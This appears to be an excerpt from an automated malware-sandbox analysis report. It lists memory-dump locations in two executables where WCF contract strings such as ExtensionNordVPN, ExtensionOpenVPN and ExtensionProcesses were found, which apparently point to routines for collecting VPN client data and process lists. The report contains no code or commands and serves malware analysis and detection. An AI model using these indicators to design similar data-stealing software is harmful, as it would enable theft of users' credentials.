                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionLanguagesLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionLanguagesResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionLanguagesResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionNordVPN
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionNordVPNLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionNordVPNResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionNordVPNResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionOpenVPN
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionOpenVPNLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionOpenVPNResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionOpenVPNResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionProcesses
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionProcessesLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionProcessesResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionProcessesResponseH9
